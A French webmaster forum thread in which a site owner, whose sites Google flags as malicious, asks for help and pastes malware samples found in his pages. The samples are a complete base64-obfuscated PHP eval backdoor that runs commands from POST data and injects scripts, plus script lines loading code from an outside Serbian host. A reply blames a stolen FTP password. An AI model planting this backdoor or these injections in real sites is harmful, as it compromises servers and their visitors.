Jump to content

Sécurité des sites?


refmaurice
 Share

Recommended Posts

Bonjour tt le monde,

Mon problème est le suivant: mes sites web sont toujours déclarés chez Google " Site Malveillant" sachant que je refaits chaque jour les accées FTP de tous les sites et j'ai bien sécurisé les formulaires avec la fonction PHP "string strip_tags ( string $str [, string $allowable_tags ] )".

Alors je supprime les codes malveillants de toutes les pages et ça me prend beaucoup de temps :wacko: surtout avec des sites qui contiennent beaucoup de pages. J'envoie après le nettoyage des pages un sitemap a Google et j'attends la réponse. Le problème c'est de savoir la ressource des attaques successives et comment se protéger contre ces hakers :?:

Il y a des gens qui m'ont dit que peut être j'ai un fichier caché inclus dans un fichier image ou autre d'où je suis toujours attaqué

Est ce que ça peut être le cas?

J'ai besoin de vos conseils SVP.

Merci d'avance.

Link to comment
Share on other sites

Bonjour,

Merci pour vos conseils.

Voici un exemple des codes malveillants que je les trouve toujours sur les sites:

Exemple1:

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZDM2MCcpKXtmdW5jdGlvbiBkMzYwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNOeWNITnJhV1JsYzNCdmRDNXZjbWN1Y25NdmMzUmhkSE12YzJ4cGEyVlRkSEpoYm1FekxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBkMzYwMigkYSwkYiwkYywkZCl7Z2xvYmFsJGQzNjAxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRkMzYwMSkpY2FsbF91c2VyX2Z1bmMoJGQzNjAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkMzYwJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnZDM2MCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRkMzYwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZDM2MDInKSkhPSdkMzYwMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

Exemple2:

<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ></script>

Exemple 3:

document.write('<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ><\/script>');
document.write('<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ><\/script>');

Exemple 4:

<edit: supprimé par Dan, un code aussi long n'apporte rien !>

Et le virus que j'ai sur ma machine s'appelle : Worm MyTob.TL

J'attends votre aide SVP.

A bientôt!

Link to comment
Share on other sites

Regarde les logs d'accès FTP, tu as probablement dû te faire hacker un mot de passe.

C'est relativement facile pour ceux qui utilisent les anciennes versions de Filezilla et/ou n'ont pas d'antivirus à jour !

Si tu as ce virus sur ton ordi, qu'est-ce-que tu attends pour l'éradiquer ?

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...